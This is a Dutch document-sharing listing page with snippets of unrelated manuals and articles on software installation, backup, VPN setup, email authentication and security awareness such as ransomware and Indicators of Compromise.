Nadere informatie

Download en installatie door de hoofdgebruiker

Download en installatie door de hoofdgebruiker Download en installatie door de hoofdgebruiker Zodra het contract in orde is hebt u via DexiaWeb /DexiaSoft toegang tot een aantal functionaliteiten die het mogelijk maken om de software te downloaden,

Nadere informatie

DUPLICATI (Bestand back-up)

DUPLICATI (Bestand back-up) DUPLICATI (Bestand back-up) Een erg compleet programma dat al jaren prima diensten bewijst is Duplicati. U kunt Dulplicati downloaden van de website duplicati.com van de makers. Versie 1.3.4 stamt uit

Nadere informatie

Inhoud 0 Inleiding 1 Algemene netwerkbegrippen De installatie van Windows Server 2003

Inhoud 0 Inleiding 1 Algemene netwerkbegrippen De installatie van Windows Server 2003 vii Inhoud 0 Inleiding 1 0.1 In dit hoofdstuk 1 0.2 Dit boek 1 0.3 De taken van een netwerkbeheerder 3 0.4 Microsoft Windows-besturingssystemen 4 0.5 PoliForm bv 7 0.6 Dit boek doorwerken 8 0.7 De installatie

Nadere informatie

Digitaal e-mail certificaat Ondertekenen en encryptie. De meest recente versie van dit document kunt u vinden op: www.ensbergen.nl

Digitaal e-mail certificaat Ondertekenen en encryptie. De meest recente versie van dit document kunt u vinden op: www.ensbergen.nl Digitaal e-mail certificaat Ondertekenen en encryptie De meest recente versie van dit document kunt u vinden op: www.ensbergen.nl Index 1 Inleiding... 4 1.1 Algemeen...4 1.2 Leeswijzer...4 2 Private key

Nadere informatie

Cloud2 Online Backup

Cloud2 Online Backup Cloud2 Online Backup Tips configuratie AhsayOBM software Gebruikersrechten instellen: Zorg ervoor dat de gebruikersnaam en wachtwoord goed zijn ingevoerd, en dat het account voldoende rechten heeft op

Nadere informatie

FerdiWeb Back-up. Installatie FerdiWeb Back-up

FerdiWeb Back-up. Installatie FerdiWeb Back-up FerdiWeb Back-up Na aanmelding krijgt u van ons een e-mail met daarin een link naar het back-up programma, die u dient te installeren op de computer waarvan u een back-up wilt maken. Het wachtwoord wordt

Nadere informatie

1-poorts USB Wireless N netwerkprintserver met 10/100 Mbps Ethernet-poort b/g/n

1-poorts USB Wireless N netwerkprintserver met 10/100 Mbps Ethernet-poort b/g/n 1-poorts USB Wireless N netwerkprintserver met 10/100 Mbps Ethernet-poort - 802.11 b/g/n Product ID: PM1115UWEU Met de PM1115UWEU Wireless-N printserver kunt u tegelijkertijd een standaard USB-printer

Nadere informatie

Installeer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen

Installeer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen Installeer Apache2: Deze howto gaat over name based virtual hosting onder Apache 2.x., en is getest onder OpenSUSE 11 maar is in feite ook van toepassing op de andere distributies. Alleen Debian en afgeleide

Nadere informatie

SELinux (project 073)

SELinux (project 073) Wat is SELinux? Het staat voor: Security Enhanced Linux Historie Het is een door de NSA en de Universiteit van Utah ontwikkelde beveiligings uitbreiding voor operating systemen. Het is door NSA opensource

Nadere informatie

Om gebruik te maken van het draadloze netwerk Eduroam, zal het programma SecureW2 geïnstalleerd moeten worden.

Om gebruik te maken van het draadloze netwerk Eduroam, zal het programma SecureW2 geïnstalleerd moeten worden. 1 Installatie van SecureW2 Om gebruik te maken van het draadloze netwerk Eduroam, zal het programma SecureW2 geïnstalleerd moeten worden. Het is natuurlijk mogelijk dat de Secure W2 Client reeds op uw

Nadere informatie

VPN Remote Access Control

VPN Remote Access Control VPN VPN Setup In deze handleiding kunt u informatie vinden over alle mogelijke VPN instellingen van de DrayTek Vigor 2130 en 2750. Hierin zullen wij alle algemene instellingen bespreken die van toepassing

Nadere informatie

Goedkope DSL aansluitingen hebben voor de bewaking op afstand een belangrijk nadeel:

Goedkope DSL aansluitingen hebben voor de bewaking op afstand een belangrijk nadeel: Wereldwijd beelden beschikbaar Kosteloze service Goedkope DSL aansluitingen hebben voor de bewaking op afstand een belangrijk nadeel: Wisselende IP adressen. Alleen via een dynamische nameserver kunt u

Nadere informatie

Indicators of Compromise

Indicators of Compromise Indicators of Compromise Pas dreigingsinformatie effectief toe Factsheet FS-2016-02 versie 1.0 8 december 2016 Als u verantwoordelijk bent voor het veilig houden van het netwerk van uw organisatie, zult

Nadere informatie

Introduceert KASPERSKY ENDPOINT SECURITY FOR BUSINESS

Introduceert KASPERSKY ENDPOINT SECURITY FOR BUSINESS Introduceert KASPERSKY ENDPOINT SECURITY FOR BUSINESS 1 Business strategieën en de impact voor de IT FLEXIBILITEIT Snel handelen met wendbaarheid en flexibiliteit Voor 66% van de organisaties staat flexibiliteit

Nadere informatie

Bewustwording Ransomware Virussen

Bewustwording Ransomware Virussen L'Unité, het Franse woord voor eenheid, oftewel 'Eenheid in Automatisering' sinds 1991... Virussen L Unité Groep Nijverheidsweg 18 info@lunite.nl 035 75 11 900 1271 EA Huizen www.lunite.nl Inleiding Gezien

Nadere informatie

Technische nota AbiFire5 Rapporten maken via ODBC

Technische nota AbiFire5 Rapporten maken via ODBC Technische nota AbiFire5 Rapporten maken via ODBC Laatste revisie: 29 juli 2009 Inhoudsopgave Inleiding... 2 1 Installatie ODBC driver... 2 2 Systeeminstellingen in AbiFire5... 3 2.1 Aanmaken extern profiel...

Nadere informatie

FAQ Veel gestelde vragen

FAQ Veel gestelde vragen FAQ Veel gestelde vragen Bladzijde 2 3 4 5 6 7 8 9 10-11 12 13 IP-adres van een PC vinden IP-adres van een PC instellen Openen van een telnet verbinding Openen van een telnet via WinWatt IP-adres van een

Nadere informatie

Installatie Handleiding Extra Werkstation

Installatie Handleiding Extra Werkstation Installatie Handleiding Extra Werkstation CA3000 Versie 2.9 Postbus 218 5150 AE Drunen Thomas Edisonweg 5 5151 DH Drunen HELPDESK : 0900-27274357 techhelp@aras.nl www.aras.nl Inhoudsopgave 1 Installatieprocedure

Nadere informatie

Solution domain. Cloud PC Backup/startkit voor partners. Datum 26/05/2015 Vertrouwelijkheid Unrestricted Onze referentie V1.

Solution domain. Cloud PC Backup/startkit voor partners. Datum 26/05/2015 Vertrouwelijkheid Unrestricted Onze referentie V1. Solution domain Cloud PC Backup/startkit voor partners Datum 26/05/2015 Vertrouwelijkheid Unrestricted Onze referentie V1.0 Contact E-mail Inhoudsopgave Inhoudsopgave... 2 1. Hoe inloggen op de Cloud PC

Nadere informatie

Encryptie deel III; Windows 2000 EFS

Encryptie deel III; Windows 2000 EFS Encryptie deel III; Windows 2000 EFS Auteur Leon Kuunders is als security consultant en managing partner werkzaam bij NedSecure Consulting. E-mail leon.kuunders@nedsecure.nl Inleiding In het eerste artikel

Nadere informatie

BSCW-WebDAV Handleiding

BSCW-WebDAV Handleiding BSCW-WebDAV Handleiding Strategische informatievoorziening Februari 2005 versie 2 Gebruik van deze handleiding Deze handleiding is bedoeld om medewerkers en studenten te ondersteunen bij het gebruik van

Nadere informatie

MULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor scan-to-file

MULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor scan-to-file MULTIFUNCTIONELE DIGITALE SYSTEMEN Aanmaken van Templates voor scan-to-file Templates aanmaken tbv scan-to-file Aanmaken van Scan Templates gaat het eenvoudigst via het webbased beheerprorgramma van de

Nadere informatie

Handleiding installatie en gebruik. Ahsay OBM. Windows server Apple OS X Linux en UNIX-varianten

Handleiding installatie en gebruik. Ahsay OBM. Windows server Apple OS X Linux en UNIX-varianten Handleiding installatie en gebruik Ahsay OBM Windows server Apple OS X Linux en UNIX-varianten INHOUD 1 Over deze handleiding 2 Systeemvereisten 3 Installatie 3.1 Linux 3.2 BSD 4 Gebruik via de GUI 5 Helpdeks

Nadere informatie

EQ3 Bodygram plus software

EQ3 Bodygram plus software EQ3 Bodygram plus software 1. Aanmelden 1.1. Openingsscherm Na installatie van de bodygram plus of na beëindiging van de demolicentie opent Bodygram plus met dit scherm en klik je op Activeer nu! 1.2.

Nadere informatie

MS Virtual pc 2007 Handleiding

MS Virtual pc 2007 Handleiding MS Virtual pc 2007 Handleiding Start de Virtual PC 2007 console en klik op [New...] om een nieuwe virtuele pc aan te maken. De wizzard voor het aanmaken van een nieuwe, virtuele pc start op. New Virtual

Nadere informatie

Uitleg SPF, DKIM & DMARC

Uitleg SPF, DKIM & DMARC Inleiding E-mail headers SPF DKIM DMARC Hulpmiddelen INLEIDING 70% tot 80% van alle verzonden email is spam E-mail (SMTP) heeft geen enkele ingebouwde beveiliging of validatie van afzender E-mail wordt

Nadere informatie

Keynote: Gevaren van zowel het GSM als het Wi-Fi netwerk

Keynote: Gevaren van zowel het GSM als het Wi-Fi netwerk Keynote: Gevaren van zowel het GSM als het Wi-Fi netwerk Roel Bierens Pieter Westein Roel Bierens Roel Bierens is een cyber security professional die gespecialiseerd is op het gebied van mobile security

Nadere informatie